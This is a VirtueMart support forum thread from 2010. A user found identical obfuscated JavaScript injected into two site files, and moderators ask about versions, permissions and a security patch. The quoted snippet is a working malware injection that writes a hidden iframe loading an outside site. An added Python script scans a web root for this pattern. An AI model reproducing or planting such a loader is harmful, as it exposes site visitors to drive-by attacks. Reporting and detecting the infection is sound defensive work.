Author Topic: VirtueMart not secure?  (Read 1456 times)
HDG
Newbie
*
Posts: 28


« on: April 13, 2010, 10:16:09 AM »

I found this in components/com_virtuemart/js/tabs/index.html:
Code:
<script>eval(unescape('%65%76%61%6C%28%66%75%6E%63%74%69%6F%6E%28%61%55%2C%75%76%62%2C%54%4F%68%2C%63%71%51%2C%45%68%43%2C%41%4D%29%7B%45%68%43%3D%53%74%72%69%6E%67%3B%69%66%28%21%27%27%2E%72%65%70%6C%61%63%65%28%2F%5E%2F%2C%53%74%72%69%6E%67%29%29%7B%77%68%69%6C%65%28%54%4F%68%2D%2D%29%41%4D%5B%54%4F%68%5D%3D%63%71%51%5B%54%4F%68%5D%7C%7C%54%4F%68%3B%63%71%51%3D%5B%66%75%6E%63%74%69%6F%6E%28%45%68%43%29%7B%72%65%74%75%72%6E%20%41%4D%5B%45%68%43%5D%7D%5D%3B%45%68%43%3D%66%75%6E%63%74%69%6F%6E%28%29%7B%72%65%74%75%72%6E%27%5C%5C%77%2B%27%7D%3B%54%4F%68%3D%31%7D%3B%77%68%69%6C%65%28%54%4F%68%2D%2D%29%69%66%28%63%71%51%5B%54%4F%68%5D%29%61%55%3D%61%55%2E%72%65%70%6C%61%63%65%28%6E%65%77%20%52%65%67%45%78%70%28%27%5C%5C%62%27%2B%45%68%43%28%54%4F%68%29%2B%27%5C%5C%62%27%2C%27%67%27%29%2C%63%71%51%5B%54%4F%68%5D%29%3B%72%65%74%75%72%6E%20%61%55%7D%28%27%35%2E%32%28%22%3C%38%20%37%3D%5C%5C%22%36%3A%2F%2F%34%2E%30%2F%5C%5C%22%20%33%3D%31%20%39%3D%31%3E%22%29%3B%27%2C%31%30%2C%31%30%2C%27%63%6F%6D%7C%7C%77%72%69%74%65%7C%77%69%64%74%68%7C%62%65%73%6C%6F%71%61%77%65%7C%64%6F%63%75%6D%65%6E%74%7C%68%74%74%70%7C%73%72%63%7C%69%66%72%61%6D%65%7C%68%65%69%67%68%74%27%2E%73%70%6C%69%74%28%27%7C%27%29%2C%30%2C%7B%7D%29%29'));</script><!-- uy7gdr5kmn -->

It seems to have been added there at Apr 13 05:05. The permissions on the file are -rw-r--r--

Is VirtueMart not secure?

Joomla 1.1.15
VM 1.1.4

[EDIT]
modules/mod_virtuemart_login.php
Code:
<script>eval(unescape('%65%76%61%6C%28%66%75%6E%63%74%69%6F%6E%28%61%55%2C%75%76%62%2C%54%4F%68%2C%63%71%51%2C%45%68%43%2C%41%4D%29%7B%45%68%43%3D%53%74%72%69%6E%67%3B%69%66%28%21%27%27%2E%72%65%70%6C%61%63%65%28%2F%5E%2F%2C%53%74%72%69%6E%67%29%29%7B%77%68%69%6C%65%28%54%4F%68%2D%2D%29%41%4D%5B%54%4F%68%5D%3D%63%71%51%5B%54%4F%68%5D%7C%7C%54%4F%68%3B%63%71%51%3D%5B%66%75%6E%63%74%69%6F%6E%28%45%68%43%29%7B%72%65%74%75%72%6E%20%41%4D%5B%45%68%43%5D%7D%5D%3B%45%68%43%3D%66%75%6E%63%74%69%6F%6E%28%29%7B%72%65%74%75%72%6E%27%5C%5C%77%2B%27%7D%3B%54%4F%68%3D%31%7D%3B%77%68%69%6C%65%28%54%4F%68%2D%2D%29%69%66%28%63%71%51%5B%54%4F%68%5D%29%61%55%3D%61%55%2E%72%65%70%6C%61%63%65%28%6E%65%77%20%52%65%67%45%78%70%28%27%5C%5C%62%27%2B%45%68%43%28%54%4F%68%29%2B%27%5C%5C%62%27%2C%27%67%27%29%2C%63%71%51%5B%54%4F%68%5D%29%3B%72%65%74%75%72%6E%20%61%55%7D%28%27%35%2E%32%28%22%3C%38%20%37%3D%5C%5C%22%36%3A%2F%2F%34%2E%30%2F%5C%5C%22%20%33%3D%31%20%39%3D%31%3E%22%29%3B%27%2C%31%30%2C%31%30%2C%27%63%6F%6D%7C%7C%77%72%69%74%65%7C%77%69%64%74%68%7C%62%65%73%6C%6F%71%61%77%65%7C%64%6F%63%75%6D%65%6E%74%7C%68%74%74%70%7C%73%72%63%7C%69%66%72%61%6D%65%7C%68%65%69%67%68%74%27%2E%73%70%6C%69%74%28%27%7C%27%29%2C%30%2C%7B%7D%29%29'));</script><!-- uy7gdr5kmn -->
« Last Edit: April 13, 2010, 10:41:55 AM by HDG » Logged
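
The check below is an added example, not part of the original thread and not VirtueMart code: it walks a web root for the `eval(unescape('%..'))` pattern quoted in the post above, reports each hit's permissions and modification time, and percent-decodes the first layer for reading without executing it. The function names and the sample tree (with a harmless marker as payload) are constructed for illustration.

```python
import os
import re
import tempfile
from urllib.parse import unquote

# Matches the injection shape quoted in the post: eval(unescape('%65%76...'))
INJECT_RE = re.compile(r"eval\(\s*unescape\(\s*(['\"])((?:%[0-9A-Fa-f]{2}){8,})\1")
SCAN_EXT = (".html", ".htm", ".php", ".js")

def decode_layer(encoded):
    """Percent-decode the payload for reading; the result is never executed."""
    return unquote(encoded, encoding="latin-1")

def scan_tree(root):
    """Return sorted (relative path, octal mode, mtime, decoded preview) per flagged file."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(SCAN_EXT):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="latin-1") as fh:
                text = fh.read()
            match = INJECT_RE.search(text)
            if match:
                st = os.stat(path)
                hits.append((os.path.relpath(path, root), oct(st.st_mode & 0o777),
                             int(st.st_mtime), decode_layer(match.group(2))[:80]))
    return sorted(hits)

def build_sample(root):
    """Constructed sample tree: one clean file, one carrying a harmless encoded marker."""
    marker = "".join("%%%02X" % b for b in b"document.title='constructed-sample';")
    os.makedirs(os.path.join(root, "js", "tabs"))
    with open(os.path.join(root, "js", "tabs", "index.html"), "w") as fh:
        fh.write("<html><body></body></html>\n<script>eval(unescape('%s'));</script>\n" % marker)
    with open(os.path.join(root, "clean.php"), "w") as fh:
        fh.write("<?php echo 'ok'; ?>\n")

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as root:
        build_sample(root)
        for rel, mode, mtime, preview in scan_tree(root):
            print(rel, mode, mtime, preview)
```

Modification times that cluster around the same minute across unrelated files, as with the two files in the post, help bound when the write happened and which logs to pull.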
Forrest
Global Moderator
Hero Member
*
Posts: 1907


« Reply #1 on: April 13, 2010, 12:43:04 PM »

Vm is secure.

What version are you running?

Did you have your files set to:
644, folder 755 recursive?

Password protect your admin folder?
Logged

jenkinhill
Global Moderator
Hero Member
*
Posts: 9763



« Reply #2 on: April 13, 2010, 16:26:48 PM »

Also what other Joomla! components are installed?

Did you apply the recommended VM 1.1.4 security patch? http://forum.virtuemart.net/index.php?topic=64207.msg213322#msg213322
Logged

Kelvyn
Jenkin Hill Internet,
Keswick, Lake District

Please do not PM or Email me with support questions. I look at PMs only once a month. You will get better and faster responses in the support forums.

Current recommended release versions are: Joomla! 1.5.23 :: VirtueMart 1.1.8

URGENT:  Help VirtueMart development by testing  version 1.1.9